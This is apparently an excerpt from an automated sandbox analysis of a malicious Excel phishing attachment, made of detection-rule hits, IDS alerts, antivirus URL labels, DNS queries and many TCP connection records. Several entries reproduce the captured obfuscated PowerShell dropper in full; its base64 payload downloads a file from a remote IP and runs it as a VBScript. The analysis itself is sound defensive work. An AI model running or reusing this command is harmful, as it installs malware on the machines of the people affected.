        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", CommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICA
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Local\Temp\m0sbmx5o.vgw.ps1

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline", ProcessId: 3896, ProcessName: csc.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-13T17:48:08.070614+010020241971A Network Trojan was detected23.95.235.2980192.168.2.2249164TCP
        2024-12-13T17:48:13.915656+010020241971A Network Trojan was detected23.95.235.2980192.168.2.2249166TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-13T17:48:08.070576+010020244491Attempted User Privilege Gain192.168.2.224916423.95.235.2980TCP
        2024-12-13T17:48:13.915589+010020244491Attempted User Privilege Gain192.168.2.224916623.95.235.2980TCP
        2024-12-13T17:48:35.714214+010020244491Attempted User Privilege Gain192.168.2.224917323.95.235.2980TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-13T17:48:52.541110+010020490381A Network Trojan was detected151.101.193.137443192.168.2.2249174TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-13T17:48:20.505425+010028587951A Network Trojan was detected192.168.2.224916723.95.235.2980TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://curt.wiz.co/9Avira URL Cloud: Label: malware
        Source: https://curt.wiz.co/VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=flufAvira URL Cloud: Label: malware
        Source: https://curt.wiz.co/VRidcbrtv4?&helium=earsplitting&pasta=verdant&mirror=x-rated&gap=brash&life=fluffy&verandaAvira URL Cloud: Label: malware
        Source: https://curt.wiz.co/Avira URL Cloud: Label: malware
        Source: https://curt.wiz.co/1.0Avira URL Cloud: Label: malware
        Source: https://curt.wiz.co/E=AL.Avira URL Cloud: Label: malware
        Source: NB PO-104105107108.xlsReversingLabs: Detection: 23%
        Source: C:\Users\user\AppData\Local\Temp\~DFC80289B61A888CC7.TMPJoe Sandbox ML: detected
        Source: NB PO-104105107108.xlsJoe Sandbox ML: detected

        Phishing

        barindex
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatnicefeatureswithsupercodebnaturalthingsinlineforgiven[1].hta, type: DROPPED
        Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: unknownHTTPS traffic detected: 170.82.173.30:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 170.82.173.30:443 -> 192.168.2.22:49165 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.2.22:49171 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.2.22:49172 version: TLS 1.2
        Source: Binary string: .pdbrq source: powershell.exe, 00000008.00000002.485183469.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.pdb source: powershell.exe, 00000008.00000002.478285781.0000000002FBE000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.pdbhP source: powershell.exe, 00000008.00000002.478285781.0000000002FBE000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.pdbhP source: powershell.exe, 00000014.00000002.519092403.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.pdb source: powershell.exe, 00000014.00000002.519092403.00000000025E3000.00000004.00000800.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: global trafficDNS query: name: curt.wiz.co
        Source: global trafficDNS query: name: curt.wiz.co
        Source: global trafficDNS query: name: curt.wiz.co
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: curt.wiz.co
        Source: global trafficDNS query: name: curt.wiz.co
        Source: global trafficDNS query: name: curt.wiz.co
        Source: global trafficDNS query: name: curt.wiz.co
        Source: global trafficDNS query: name: curt.wiz.co
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: res.cloudinary.com
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 170.82.173.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 170.82.174.30:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.193.137:443
